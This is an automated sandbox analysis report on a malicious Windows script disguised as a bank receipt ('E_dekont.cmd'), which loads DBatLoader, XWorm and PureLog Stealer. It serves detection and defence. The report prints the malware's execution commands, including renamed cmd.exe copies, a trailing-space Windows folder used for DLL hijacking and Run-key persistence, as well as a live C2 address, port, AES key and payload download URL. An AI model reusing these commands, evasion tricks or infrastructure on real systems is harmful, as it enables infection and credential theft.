Windows Analysis Report
E_dekont.cmd

Overview

General Information

Sample name: E_dekont.cmd
Analysis ID: 1546600
MD5: 79c1ba6106f6cb367fc280abae110506
SHA1: 2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256: 09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
Tags: cmduser-lowmal3
Infos:

Detection

DBatLoader, Nitol, PureLog Stealer, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Nitol
Yara detected PureLog Stealer
Yara detected XWorm
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 4912 cmdline: extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 3840 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 943266BC468E334D168F1F43831E8B7D)
      • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5364 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 7028 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • alpha.pif (PID: 7048 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 2452 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 1056 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • xpha.pif (PID: 1728 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • alpha.pif (PID: 3828 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 5640 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • alpha.pif (PID: 5656 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • esentutl.exe (PID: 5644 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wdmvmswJ.pif (PID: 4536 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • svchost.exe (PID: 2332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • armsvc.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: E270AE516A40989DA2942FC5476DC07D)
  • alg.exe (PID: 4916 cmdline: C:\Windows\System32\alg.exe MD5: C735DBF5B2240108A94A4D6FB664CF20)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 2036 cmdline: C:\Windows\system32\AppVClient.exe MD5: 967B8B62127D887C6080C553324E82B9)
  • FXSSVC.exe (PID: 3676 cmdline: C:\Windows\system32\fxssvc.exe MD5: 43FB9AC7ED234297B5E93DB791F8F5A8)
  • elevation_service.exe (PID: 7028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BE02F61FAC56C7D6563B746AF0B6AB07)
  • Jwsmvmdw.PIF (PID: 2636 cmdline: "C:\Users\Public\Libraries\Jwsmvmdw.PIF" MD5: 943266BC468E334D168F1F43831E8B7D)
    • wdmvmswJ.pif (PID: 2056 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • maintenanceservice.exe (PID: 7048 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 6E2F1562B4D5A495EA5EE8392DBBC2E3)
  • msdtc.exe (PID: 6104 cmdline: C:\Windows\System32\msdtc.exe MD5: 7C2A7829306AFD07E0A7BEE6B5203F55)
  • PerceptionSimulationService.exe (PID: 2532 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 083A7B3F7A1D4646EF789825E52C02AC)
  • Jwsmvmdw.PIF (PID: 6036 cmdline: "C:\Users\Public\Libraries\Jwsmvmdw.PIF" MD5: 943266BC468E334D168F1F43831E8B7D)
    • wdmvmswJ.pif (PID: 6792 cmdline: C:\Users\Public\Libraries\wdmvmswJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • perfhost.exe (PID: 7132 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 66E9108DA1C020C738D8EA65CDBF5BE1)
  • Locator.exe (PID: 5736 cmdline: C:\Windows\system32\locator.exe MD5: 525F4AE8B0B51CA29D93DB1875D48945)
  • SensorDataService.exe (PID: 5184 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 78D3D3C671FAB25B9BF6149AD1D00F30)
  • snmptrap.exe (PID: 3528 cmdline: C:\Windows\System32\snmptrap.exe MD5: 16010E8846BCE27721A406159D8AE296)
  • Spectrum.exe (PID: 5656 cmdline: C:\Windows\system32\spectrum.exe MD5: 5B5A04180D3C1BE14C02BA823EFE4460)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Nitol | | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
Source | Rule | Description | Author | Strings
00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Source | Rule | Description | Author | Strings
38.2.wdmvmswJ.pif.1e8fecae.7.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
38.1.wdmvmswJ.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
38.2.wdmvmswJ.pif.213f0000.13.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
12.3.wdmvmswJ.pif.1e700000.852.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
38.2.wdmvmswJ.pif.1eb40f08.9.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wdmvmswJ.pif, NewProcessName: C:\Users\Public\Libraries\wdmvmswJ.pif, OriginalFileName: C:\Users\Public\Libraries\wdmvmswJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, ProcessId: 4536, ProcessName: wdmvmswJ.pif
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Jwsmvmdw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jwsmvmdw
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 54.244.188.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\wdmvmswJ.pif, Initiated: true, ProcessId: 4536, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Jwsmvmdw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 3840, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jwsmvmdw
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wdmvmswJ.pif, NewProcessName: C:\Users\Public\Libraries\wdmvmswJ.pif, OriginalFileName: C:\Users\Public\Libraries\wdmvmswJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\wdmvmswJ.pif, ProcessId: 4536, ProcessName: wdmvmswJ.pif
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, ProcessId: 2332, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 3840, ParentProcessName: x.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc, ProcessId: 2332, ProcessName: svchost.exe
                2024-11-01T08:25:04.041691+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:10.059508+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:21.736445+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:22.900401+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:32.760012+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.701299+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.758283+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:33.848152+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.439810+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.959728+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:39.965053+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.231794+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.563650+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:40.568793+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:47.290307+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:55.806711+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:25:55.961031+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:07.321143+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:11.013950+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:22.514173+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:26.926028+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:27.085713+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:32.087557+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:32.236395+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:42.387927+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:42.517884+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:53.946613+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:26:58.431917+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:10.198646+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:15.197934+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:17.587127+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:19.511336+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                2024-11-01T08:27:31.112355+010028529231Malware Command and Control Activity Detected192.168.2.84972762.60.190.1207923TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-01T08:23:40.212666+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:10.211554+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:24:40.219750+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:10.215574+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:25:40.218338+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:10.211450+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:26:40.211588+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:10.271854+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                2024-11-01T08:27:40.214322+010028528741Malware Command and Control Activity Detected62.60.190.1207923192.168.2.849727TCP
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-11-01T08:25:39.986938+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49727 | 62.60.190.120 | 7923 | TCP


                AV Detection

                Source: E_dekont.cmd, Malware Configuration Extractor: DBatLoader {"Download Url": ["https://chichometextiles.com/wp-admin/233_Jwsmvmdweya"]}
                Source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["62.60.190.120"], "Port": "7923", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                Source: uaafd.biz, Virustotal: Detection: 12%
                Source: xnxvnn.biz, Virustotal: Detection: 13%
                Source: nlscndwp.biz, Virustotal: Detection: 11%
                Source: vjaxhpbji.biz, Virustotal: Detection: 13%
                Source: E_dekont.cmd, ReversingLabs: Detection: 44%
                Source: E_dekont.cmd, Virustotal: Detection: 46%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability

                Compliance

                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Unpacked PE file: 30.2.wdmvmswJ.pif.400000.3.unpack
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif, Unpacked PE file: 38.2.wdmvmswJ.pif.400000.5.unpack
                Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.0000000002932000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B3F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1533562937.0000000021B10000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002931000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: Acrobat_SL.pdb((( source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdb source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: wdmvmswJ.pif, 0000000C.00000003.2318451928.000000001E760000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2333734173.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2320176993.000000001E620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921745733.0000000000460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2921663760.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: mavinject32.pdb source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: 64BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2227816265.000000001E790000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: snmptrap.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msdtcexe.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PerceptionSimulationService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: wdmvmswJ.pif, 0000000C.00000003.2209705208.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
